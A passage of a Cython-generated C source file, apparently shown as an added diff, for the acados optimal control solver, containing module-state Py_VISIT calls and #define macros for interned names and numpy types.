Py_VISIT(traverse_module_state->__pyx_n_s_mem_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_memview); + Py_VISIT(traverse_module_state->__pyx_n_s_min_size); + Py_VISIT(traverse_module_state->__pyx_n_s_mode); + Py_VISIT(traverse_module_state->__pyx_n_s_model_name); + Py_VISIT(traverse_module_state->__pyx_n_s_msg); + Py_VISIT(traverse_module_state->__pyx_n_s_n); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_n_s_name_2); + Py_VISIT(traverse_module_state->__pyx_n_s_ndim); + Py_VISIT(traverse_module_state->__pyx_n_s_new); + Py_VISIT(traverse_module_state->__pyx_n_s_new_time_steps); + Py_VISIT(traverse_module_state->__pyx_n_s_nlp_solver_type); + Py_VISIT(traverse_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_VISIT(traverse_module_state->__pyx_n_s_np); + Py_VISIT(traverse_module_state->__pyx_n_s_numpy); + Py_VISIT(traverse_module_state->__pyx_kp_u_numpy_core_multiarray_failed_to); + Py_VISIT(traverse_module_state->__pyx_kp_u_numpy_core_umath_failed_to_impor); + Py_VISIT(traverse_module_state->__pyx_n_s_nx); + Py_VISIT(traverse_module_state->__pyx_n_s_obj); + Py_VISIT(traverse_module_state->__pyx_n_s_open); + Py_VISIT(traverse_module_state->__pyx_n_s_options_set); + Py_VISIT(traverse_module_state->__pyx_n_s_order); + Py_VISIT(traverse_module_state->__pyx_n_s_os); + Py_VISIT(traverse_module_state->__pyx_n_s_out); + Py_VISIT(traverse_module_state->__pyx_n_s_out_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_out_mat); + Py_VISIT(traverse_module_state->__pyx_n_s_overwrite); + Py_VISIT(traverse_module_state->__pyx_n_u_p); + Py_VISIT(traverse_module_state->__pyx_n_s_pack); + Py_VISIT(traverse_module_state->__pyx_n_s_path); + Py_VISIT(traverse_module_state->__pyx_n_u_pi); + Py_VISIT(traverse_module_state->__pyx_n_u_pi_2); + Py_VISIT(traverse_module_state->__pyx_n_s_pickle); + Py_VISIT(traverse_module_state->__pyx_n_s_print); + Py_VISIT(traverse_module_state->__pyx_n_u_print_level); + Py_VISIT(traverse_module_state->__pyx_n_s_print_statistics); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_checksum); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_result); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_state); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_type); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_unpickle_Enum); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_vtable); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_iter); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_mu0); + Py_VISIT(traverse_module_state->__pyx_n_s_qp_solver_cond_N); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_tau_min); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_tol_comp); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_tol_eq); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_tol_ineq); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_tol_stat); + Py_VISIT(traverse_module_state->__pyx_n_u_qp_warm_start); + Py_VISIT(traverse_module_state->__pyx_n_u_r); + Py_VISIT(traverse_module_state->__pyx_n_s_range); + Py_VISIT(traverse_module_state->__pyx_n_s_recompute); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_register); + Py_VISIT(traverse_module_state->__pyx_n_b_res_comp); + Py_VISIT(traverse_module_state->__pyx_n_b_res_eq); + Py_VISIT(traverse_module_state->__pyx_n_b_res_ineq); + Py_VISIT(traverse_module_state->__pyx_n_b_res_stat); + Py_VISIT(traverse_module_state->__pyx_n_s_reset); + Py_VISIT(traverse_module_state->__pyx_n_u_residuals); + Py_VISIT(traverse_module_state->__pyx_n_u_rti_phase); + Py_VISIT(traverse_module_state->__pyx_n_s_self); + Py_VISIT(traverse_module_state->__pyx_n_s_set); + Py_VISIT(traverse_module_state->__pyx_n_s_set_new_time_steps); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_shape); + Py_VISIT(traverse_module_state->__pyx_n_s_size); + Py_VISIT(traverse_module_state->__pyx_n_u_sl); + Py_VISIT(traverse_module_state->__pyx_n_u_sl_2); + Py_VISIT(traverse_module_state->__pyx_n_s_solution); + Py_VISIT(traverse_module_state->__pyx_n_s_solve); + Py_VISIT(traverse_module_state->__pyx_kp_u_solver_option_must_be_of_type_fl); + Py_VISIT(traverse_module_state->__pyx_kp_u_solver_option_must_be_of_type_in); + Py_VISIT(traverse_module_state->__pyx_kp_u_solver_option_must_be_of_type_st); + Py_VISIT(traverse_module_state->__pyx_n_s_sort_keys); + Py_VISIT(traverse_module_state->__pyx_n_s_spec); + Py_VISIT(traverse_module_state->__pyx_n_s_split); + Py_VISIT(traverse_module_state->__pyx_n_s_sqp_iter); + Py_VISIT(traverse_module_state->__pyx_n_u_sqp_iter); + Py_VISIT(traverse_module_state->__pyx_n_s_stage); + Py_VISIT(traverse_module_state->__pyx_n_s_start); + Py_VISIT(traverse_module_state->__pyx_n_s_stat_m); + Py_VISIT(traverse_module_state->__pyx_n_u_stat_m); + Py_VISIT(traverse_module_state->__pyx_n_s_stat_n); + Py_VISIT(traverse_module_state->__pyx_n_u_stat_n); + Py_VISIT(traverse_module_state->__pyx_n_u_statistics); + Py_VISIT(traverse_module_state->__pyx_n_s_step); + Py_VISIT(traverse_module_state->__pyx_n_u_step_length); + Py_VISIT(traverse_module_state->__pyx_n_s_stop); + Py_VISIT(traverse_module_state->__pyx_n_s_store_iterate); + Py_VISIT(traverse_module_state->__pyx_n_s_store_iterate_locals_lambda); + Py_VISIT(traverse_module_state->__pyx_kp_u_stored_current_iterate_in); + Py_VISIT(traverse_module_state->__pyx_n_s_strftime); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_direct); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_direct_or_indirect); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_indirect); + Py_VISIT(traverse_module_state->__pyx_n_s_string_fields); + Py_VISIT(traverse_module_state->__pyx_n_s_string_value); + Py_VISIT(traverse_module_state->__pyx_kp_s_stringsource); + Py_VISIT(traverse_module_state->__pyx_n_s_struct); + Py_VISIT(traverse_module_state->__pyx_n_u_su); + Py_VISIT(traverse_module_state->__pyx_n_u_su_2); + Py_VISIT(traverse_module_state->__pyx_n_s_sys); + Py_VISIT(traverse_module_state->__pyx_n_u_t); + Py_VISIT(traverse_module_state->__pyx_n_u_t_2); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_kp_s_third_party_acados_acados_templa); + Py_VISIT(traverse_module_state->__pyx_n_u_time_glob); + Py_VISIT(traverse_module_state->__pyx_n_u_time_lin); + Py_VISIT(traverse_module_state->__pyx_n_u_time_qp); + Py_VISIT(traverse_module_state->__pyx_n_u_time_qp_solver_call); + Py_VISIT(traverse_module_state->__pyx_n_u_time_qp_xcond); + Py_VISIT(traverse_module_state->__pyx_n_u_time_reg); + Py_VISIT(traverse_module_state->__pyx_n_u_time_sim); + Py_VISIT(traverse_module_state->__pyx_n_u_time_sim_ad); + Py_VISIT(traverse_module_state->__pyx_n_u_time_sim_la); + Py_VISIT(traverse_module_state->__pyx_n_u_time_solution_sensitivities); + Py_VISIT(traverse_module_state->__pyx_n_u_time_tot); + Py_VISIT(traverse_module_state->__pyx_n_u_tol_comp); + Py_VISIT(traverse_module_state->__pyx_n_u_tol_eq); + Py_VISIT(traverse_module_state->__pyx_n_u_tol_ineq); + Py_VISIT(traverse_module_state->__pyx_n_u_tol_stat); + Py_VISIT(traverse_module_state->__pyx_n_s_tolist); + Py_VISIT(traverse_module_state->__pyx_n_u_u); + Py_VISIT(traverse_module_state->__pyx_n_u_u_2); + Py_VISIT(traverse_module_state->__pyx_n_u_ubu); + Py_VISIT(traverse_module_state->__pyx_n_u_ubx); + Py_VISIT(traverse_module_state->__pyx_kp_s_unable_to_allocate_array_data); + Py_VISIT(traverse_module_state->__pyx_kp_s_unable_to_allocate_shape_and_str); + Py_VISIT(traverse_module_state->__pyx_n_s_unpack); + Py_VISIT(traverse_module_state->__pyx_n_s_update); + Py_VISIT(traverse_module_state->__pyx_n_s_update_qp_solver_cond_N); + Py_VISIT(traverse_module_state->__pyx_n_s_utcnow); + Py_VISIT(traverse_module_state->__pyx_kp_u_utf_8); + Py_VISIT(traverse_module_state->__pyx_n_s_value); + Py_VISIT(traverse_module_state->__pyx_n_s_value_2); + Py_VISIT(traverse_module_state->__pyx_n_s_value_shape); + Py_VISIT(traverse_module_state->__pyx_n_s_version_info); + Py_VISIT(traverse_module_state->__pyx_n_u_w); + Py_VISIT(traverse_module_state->__pyx_n_u_warm_start_first_qp); + Py_VISIT(traverse_module_state->__pyx_kp_u_with_dimension); + Py_VISIT(traverse_module_state->__pyx_kp_u_with_dimension_you_have); + Py_VISIT(traverse_module_state->__pyx_n_b_x); + Py_VISIT(traverse_module_state->__pyx_n_s_x); + Py_VISIT(traverse_module_state->__pyx_n_u_x); + Py_VISIT(traverse_module_state->__pyx_n_u_x_2); + Py_VISIT(traverse_module_state->__pyx_n_u_xdot_guess); + Py_VISIT(traverse_module_state->__pyx_n_u_y_ref); + Py_VISIT(traverse_module_state->__pyx_kp_u_you_have); + Py_VISIT(traverse_module_state->__pyx_n_u_yref); + Py_VISIT(traverse_module_state->__pyx_n_u_z); + Py_VISIT(traverse_module_state->__pyx_n_u_z_2); + Py_VISIT(traverse_module_state->__pyx_n_u_z_guess); + Py_VISIT(traverse_module_state->__pyx_n_s_zeros); + Py_VISIT(traverse_module_state->__pyx_int_0); + Py_VISIT(traverse_module_state->__pyx_int_1); + Py_VISIT(traverse_module_state->__pyx_int_2); + Py_VISIT(traverse_module_state->__pyx_int_3); + Py_VISIT(traverse_module_state->__pyx_int_4); + Py_VISIT(traverse_module_state->__pyx_int_6); + Py_VISIT(traverse_module_state->__pyx_int_7); + Py_VISIT(traverse_module_state->__pyx_int_112105877); + Py_VISIT(traverse_module_state->__pyx_int_136983863); + Py_VISIT(traverse_module_state->__pyx_int_184977713); + Py_VISIT(traverse_module_state->__pyx_int_neg_1); + Py_VISIT(traverse_module_state->__pyx_int_neg_5); + Py_VISIT(traverse_module_state->__pyx_slice__5); + Py_VISIT(traverse_module_state->__pyx_tuple__4); + Py_VISIT(traverse_module_state->__pyx_tuple__8); + Py_VISIT(traverse_module_state->__pyx_tuple__9); + Py_VISIT(traverse_module_state->__pyx_slice__16); + Py_VISIT(traverse_module_state->__pyx_tuple__10); + Py_VISIT(traverse_module_state->__pyx_tuple__11); + Py_VISIT(traverse_module_state->__pyx_tuple__12); + Py_VISIT(traverse_module_state->__pyx_tuple__13); + Py_VISIT(traverse_module_state->__pyx_tuple__17); + Py_VISIT(traverse_module_state->__pyx_tuple__18); + Py_VISIT(traverse_module_state->__pyx_tuple__19); + Py_VISIT(traverse_module_state->__pyx_tuple__20); + Py_VISIT(traverse_module_state->__pyx_tuple__21); + Py_VISIT(traverse_module_state->__pyx_tuple__22); + Py_VISIT(traverse_module_state->__pyx_tuple__23); + Py_VISIT(traverse_module_state->__pyx_tuple__24); + Py_VISIT(traverse_module_state->__pyx_tuple__25); + Py_VISIT(traverse_module_state->__pyx_tuple__26); + Py_VISIT(traverse_module_state->__pyx_tuple__27); + Py_VISIT(traverse_module_state->__pyx_tuple__28); + Py_VISIT(traverse_module_state->__pyx_tuple__30); + Py_VISIT(traverse_module_state->__pyx_tuple__31); + Py_VISIT(traverse_module_state->__pyx_tuple__32); + Py_VISIT(traverse_module_state->__pyx_tuple__33); + Py_VISIT(traverse_module_state->__pyx_tuple__34); + Py_VISIT(traverse_module_state->__pyx_tuple__35); + Py_VISIT(traverse_module_state->__pyx_tuple__36); + Py_VISIT(traverse_module_state->__pyx_tuple__37); + Py_VISIT(traverse_module_state->__pyx_tuple__38); + Py_VISIT(traverse_module_state->__pyx_tuple__39); + Py_VISIT(traverse_module_state->__pyx_tuple__41); + Py_VISIT(traverse_module_state->__pyx_tuple__45); + Py_VISIT(traverse_module_state->__pyx_tuple__47); + Py_VISIT(traverse_module_state->__pyx_tuple__49); + Py_VISIT(traverse_module_state->__pyx_tuple__51); + Py_VISIT(traverse_module_state->__pyx_tuple__52); + Py_VISIT(traverse_module_state->__pyx_tuple__55); + Py_VISIT(traverse_module_state->__pyx_tuple__57); + Py_VISIT(traverse_module_state->__pyx_tuple__58); + Py_VISIT(traverse_module_state->__pyx_tuple__60); + Py_VISIT(traverse_module_state->__pyx_tuple__62); + Py_VISIT(traverse_module_state->__pyx_tuple__65); + Py_VISIT(traverse_module_state->__pyx_tuple__67); + Py_VISIT(traverse_module_state->__pyx_tuple__69); + Py_VISIT(traverse_module_state->__pyx_tuple__71); + Py_VISIT(traverse_module_state->__pyx_tuple__72); + Py_VISIT(traverse_module_state->__pyx_tuple__74); + Py_VISIT(traverse_module_state->__pyx_tuple__77); + Py_VISIT(traverse_module_state->__pyx_tuple__79); + Py_VISIT(traverse_module_state->__pyx_tuple__82); + Py_VISIT(traverse_module_state->__pyx_codeobj__40); + Py_VISIT(traverse_module_state->__pyx_codeobj__42); + Py_VISIT(traverse_module_state->__pyx_codeobj__43); + Py_VISIT(traverse_module_state->__pyx_codeobj__44); + Py_VISIT(traverse_module_state->__pyx_codeobj__46); + Py_VISIT(traverse_module_state->__pyx_codeobj__48); + Py_VISIT(traverse_module_state->__pyx_codeobj__50); + Py_VISIT(traverse_module_state->__pyx_codeobj__53); + Py_VISIT(traverse_module_state->__pyx_codeobj__54); + Py_VISIT(traverse_module_state->__pyx_codeobj__56); + Py_VISIT(traverse_module_state->__pyx_codeobj__59); + Py_VISIT(traverse_module_state->__pyx_codeobj__61); + Py_VISIT(traverse_module_state->__pyx_codeobj__63); + Py_VISIT(traverse_module_state->__pyx_codeobj__64); + Py_VISIT(traverse_module_state->__pyx_codeobj__66); + Py_VISIT(traverse_module_state->__pyx_codeobj__68); + Py_VISIT(traverse_module_state->__pyx_codeobj__70); + Py_VISIT(traverse_module_state->__pyx_codeobj__73); + Py_VISIT(traverse_module_state->__pyx_codeobj__75); + Py_VISIT(traverse_module_state->__pyx_codeobj__76); + Py_VISIT(traverse_module_state->__pyx_codeobj__78); + Py_VISIT(traverse_module_state->__pyx_codeobj__80); + Py_VISIT(traverse_module_state->__pyx_codeobj__81); + Py_VISIT(traverse_module_state->__pyx_codeobj__83); + return 0; +} +#endif +/* #### Code section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_ptype_7cpython_4type_type __pyx_mstate_global->__pyx_ptype_7cpython_4type_type +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_ptype_5numpy_dtype __pyx_mstate_global->__pyx_ptype_5numpy_dtype +#define __pyx_ptype_5numpy_flatiter __pyx_mstate_global->__pyx_ptype_5numpy_flatiter +#define __pyx_ptype_5numpy_broadcast __pyx_mstate_global->__pyx_ptype_5numpy_broadcast +#define __pyx_ptype_5numpy_ndarray __pyx_mstate_global->__pyx_ptype_5numpy_ndarray +#define __pyx_ptype_5numpy_generic __pyx_mstate_global->__pyx_ptype_5numpy_generic +#define __pyx_ptype_5numpy_number __pyx_mstate_global->__pyx_ptype_5numpy_number +#define __pyx_ptype_5numpy_integer __pyx_mstate_global->__pyx_ptype_5numpy_integer +#define __pyx_ptype_5numpy_signedinteger __pyx_mstate_global->__pyx_ptype_5numpy_signedinteger +#define __pyx_ptype_5numpy_unsignedinteger __pyx_mstate_global->__pyx_ptype_5numpy_unsignedinteger +#define __pyx_ptype_5numpy_inexact __pyx_mstate_global->__pyx_ptype_5numpy_inexact +#define __pyx_ptype_5numpy_floating __pyx_mstate_global->__pyx_ptype_5numpy_floating +#define __pyx_ptype_5numpy_complexfloating __pyx_mstate_global->__pyx_ptype_5numpy_complexfloating +#define __pyx_ptype_5numpy_flexible __pyx_mstate_global->__pyx_ptype_5numpy_flexible +#define __pyx_ptype_5numpy_character __pyx_mstate_global->__pyx_ptype_5numpy_character +#define __pyx_ptype_5numpy_ufunc __pyx_mstate_global->__pyx_ptype_5numpy_ufunc +#if CYTHON_USE_MODULE_STATE +#define __pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython __pyx_mstate_global->__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython +#define __pyx_type___pyx_array __pyx_mstate_global->__pyx_type___pyx_array +#define __pyx_type___pyx_MemviewEnum __pyx_mstate_global->__pyx_type___pyx_MemviewEnum +#define __pyx_type___pyx_memoryview __pyx_mstate_global->__pyx_type___pyx_memoryview +#define __pyx_type___pyx_memoryviewslice __pyx_mstate_global->__pyx_type___pyx_memoryviewslice +#endif +#define __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython __pyx_mstate_global->__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython +#define __pyx_array_type __pyx_mstate_global->__pyx_array_type +#define __pyx_MemviewEnum_type __pyx_mstate_global->__pyx_MemviewEnum_type +#define __pyx_memoryview_type __pyx_mstate_global->__pyx_memoryview_type +#define __pyx_memoryviewslice_type __pyx_mstate_global->__pyx_memoryviewslice_type +#define __pyx_kp_u_ __pyx_mstate_global->__pyx_kp_u_ +#define __pyx_n_s_ASCII __pyx_mstate_global->__pyx_n_s_ASCII +#define __pyx_n_s_AcadosOcpSolverCython __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython +#define __pyx_n_s_AcadosOcpSolverCython___get_poin __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___get_poin +#define __pyx_n_s_AcadosOcpSolverCython___get_stat __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___get_stat +#define __pyx_n_s_AcadosOcpSolverCython___get_stat_2 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___get_stat_2 +#define __pyx_n_s_AcadosOcpSolverCython___get_stat_3 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___get_stat_3 +#define __pyx_n_s_AcadosOcpSolverCython___reduce_c __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___reduce_c +#define __pyx_n_s_AcadosOcpSolverCython___setstate __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython___setstate +#define __pyx_n_s_AcadosOcpSolverCython__get_poin __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython__get_poin +#define __pyx_n_s_AcadosOcpSolverCython__get_stat __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython__get_stat +#define __pyx_n_s_AcadosOcpSolverCython__get_stat_2 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython__get_stat_2 +#define __pyx_n_s_AcadosOcpSolverCython__get_stat_3 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython__get_stat_3 +#define __pyx_kp_u_AcadosOcpSolverCython_constraint __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_constraint +#define __pyx_n_s_AcadosOcpSolverCython_constraint_2 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_constraint_2 +#define __pyx_n_s_AcadosOcpSolverCython_cost_set __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_cost_set +#define __pyx_kp_u_AcadosOcpSolverCython_cost_set_m __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_cost_set_m +#define __pyx_kp_u_AcadosOcpSolverCython_does_not_s __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_does_not_s +#define __pyx_kp_u_AcadosOcpSolverCython_does_not_s_2 __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_does_not_s_2 +#define __pyx_n_s_AcadosOcpSolverCython_dynamics_g __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_dynamics_g +#define __pyx_kp_u_AcadosOcpSolverCython_eval_param __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_eval_param +#define __pyx_kp_u_AcadosOcpSolverCython_eval_param_2 __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_eval_param_2 +#define __pyx_n_s_AcadosOcpSolverCython_eval_param_3 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_eval_param_3 +#define __pyx_n_s_AcadosOcpSolverCython_get __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_get +#define __pyx_n_s_AcadosOcpSolverCython_get_cost __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_get_cost +#define __pyx_kp_u_AcadosOcpSolverCython_get_field __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_get_field +#define __pyx_kp_u_AcadosOcpSolverCython_get_is_an __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_get_is_an +#define __pyx_n_s_AcadosOcpSolverCython_get_residu __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_get_residu +#define __pyx_kp_u_AcadosOcpSolverCython_get_stage __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_get_stage +#define __pyx_n_s_AcadosOcpSolverCython_get_stats __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_get_stats +#define __pyx_n_s_AcadosOcpSolverCython_load_itera __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_load_itera +#define __pyx_kp_u_AcadosOcpSolverCython_options_se __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_options_se +#define __pyx_n_s_AcadosOcpSolverCython_options_se_2 __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_options_se_2 +#define __pyx_n_s_AcadosOcpSolverCython_print_stat __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_print_stat +#define __pyx_n_s_AcadosOcpSolverCython_reset __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_reset +#define __pyx_n_s_AcadosOcpSolverCython_set __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_set +#define __pyx_kp_u_AcadosOcpSolverCython_set_is_not __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_set_is_not +#define __pyx_kp_u_AcadosOcpSolverCython_set_mismat __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_set_mismat +#define __pyx_n_s_AcadosOcpSolverCython_set_new_ti __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_set_new_ti +#define __pyx_n_s_AcadosOcpSolverCython_solve __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_solve +#define __pyx_kp_u_AcadosOcpSolverCython_solve_argu __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_solve_argu +#define __pyx_kp_u_AcadosOcpSolverCython_solve_argu_2 __pyx_mstate_global->__pyx_kp_u_AcadosOcpSolverCython_solve_argu_2 +#define __pyx_n_s_AcadosOcpSolverCython_store_iter __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_store_iter +#define __pyx_n_s_AcadosOcpSolverCython_update_qp __pyx_mstate_global->__pyx_n_s_AcadosOcpSolverCython_update_qp +#define __pyx_kp_s_All_dimensions_preceding_dimensi __pyx_mstate_global->__pyx_kp_s_All_dimensions_preceding_dimensi +#define __pyx_n_s_AssertionError __pyx_mstate_global->__pyx_n_s_AssertionError +#define __pyx_kp_s_Buffer_view_does_not_expose_stri __pyx_mstate_global->__pyx_kp_s_Buffer_view_does_not_expose_stri +#define __pyx_kp_s_Can_only_create_a_buffer_that_is __pyx_mstate_global->__pyx_kp_s_Can_only_create_a_buffer_that_is +#define __pyx_kp_s_Cannot_assign_to_read_only_memor __pyx_mstate_global->__pyx_kp_s_Cannot_assign_to_read_only_memor +#define __pyx_kp_s_Cannot_create_writable_memory_vi __pyx_mstate_global->__pyx_kp_s_Cannot_create_writable_memory_vi +#define __pyx_kp_u_Cannot_index_with_type __pyx_mstate_global->__pyx_kp_u_Cannot_index_with_type +#define __pyx_kp_s_Cannot_transpose_memoryview_with __pyx_mstate_global->__pyx_kp_s_Cannot_transpose_memoryview_with +#define __pyx_kp_s_Dimension_d_is_not_direct __pyx_mstate_global->__pyx_kp_s_Dimension_d_is_not_direct +#define __pyx_n_s_Ellipsis __pyx_mstate_global->__pyx_n_s_Ellipsis +#define __pyx_kp_s_Empty_shape_tuple_for_cython_arr __pyx_mstate_global->__pyx_kp_s_Empty_shape_tuple_for_cython_arr +#define __pyx_n_u_F __pyx_mstate_global->__pyx_n_u_F +#define __pyx_n_s_ImportError __pyx_mstate_global->__pyx_n_s_ImportError +#define __pyx_kp_s_Incompatible_checksums_0x_x_vs_0 __pyx_mstate_global->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0 +#define __pyx_n_s_IndexError __pyx_mstate_global->__pyx_n_s_IndexError +#define __pyx_kp_s_Index_out_of_bounds_axis_d __pyx_mstate_global->__pyx_kp_s_Index_out_of_bounds_axis_d +#define __pyx_kp_s_Indirect_dimensions_not_supporte __pyx_mstate_global->__pyx_kp_s_Indirect_dimensions_not_supporte +#define __pyx_kp_u_Invalid_mode_expected_c_or_fortr __pyx_mstate_global->__pyx_kp_u_Invalid_mode_expected_c_or_fortr +#define __pyx_kp_u_Invalid_shape_in_axis __pyx_mstate_global->__pyx_kp_u_Invalid_shape_in_axis +#define __pyx_n_s_MemoryError __pyx_mstate_global->__pyx_n_s_MemoryError +#define __pyx_kp_s_MemoryView_of_r_at_0x_x __pyx_mstate_global->__pyx_kp_s_MemoryView_of_r_at_0x_x +#define __pyx_kp_s_MemoryView_of_r_object __pyx_mstate_global->__pyx_kp_s_MemoryView_of_r_object +#define __pyx_n_s_N __pyx_mstate_global->__pyx_n_s_N +#define __pyx_kp_u_None __pyx_mstate_global->__pyx_kp_u_None +#define __pyx_n_s_NotImplementedError __pyx_mstate_global->__pyx_n_s_NotImplementedError +#define __pyx_n_b_O __pyx_mstate_global->__pyx_n_b_O +#define __pyx_kp_u_Out_of_bounds_on_buffer_access_a __pyx_mstate_global->__pyx_kp_u_Out_of_bounds_on_buffer_access_a +#define __pyx_n_s_PickleError __pyx_mstate_global->__pyx_n_s_PickleError +#define __pyx_n_u_SQP __pyx_mstate_global->__pyx_n_u_SQP +#define __pyx_n_u_SQP_RTI __pyx_mstate_global->__pyx_n_u_SQP_RTI +#define __pyx_n_s_Sequence __pyx_mstate_global->__pyx_n_s_Sequence +#define __pyx_kp_s_Step_may_not_be_zero_axis_d __pyx_mstate_global->__pyx_kp_s_Step_may_not_be_zero_axis_d +#define __pyx_kp_u_TODO __pyx_mstate_global->__pyx_kp_u_TODO +#define __pyx_n_s_TypeError __pyx_mstate_global->__pyx_n_s_TypeError +#define __pyx_kp_s_Unable_to_convert_item_to_object __pyx_mstate_global->__pyx_kp_s_Unable_to_convert_item_to_object +#define __pyx_n_s_ValueError __pyx_mstate_global->__pyx_n_s_ValueError +#define __pyx_n_s_View_MemoryView __pyx_mstate_global->__pyx_n_s_View_MemoryView +#define __pyx_kp_u_Y_m_d_H_M_S_f __pyx_mstate_global->__pyx_kp_u_Y_m_d_H_M_S_f +#define __pyx_kp_u__14 __pyx_mstate_global->__pyx_kp_u__14 +#define __pyx_n_u__15 __pyx_mstate_global->__pyx_n_u__15 +#define __pyx_kp_u__2 __pyx_mstate_global->__pyx_kp_u__2 +#define __pyx_kp_u__29 __pyx_mstate_global->__pyx_kp_u__29 +#define __pyx_n_s__3 __pyx_mstate_global->__pyx_n_s__3 +#define __pyx_kp_u__6 __pyx_mstate_global->__pyx_kp_u__6 +#define 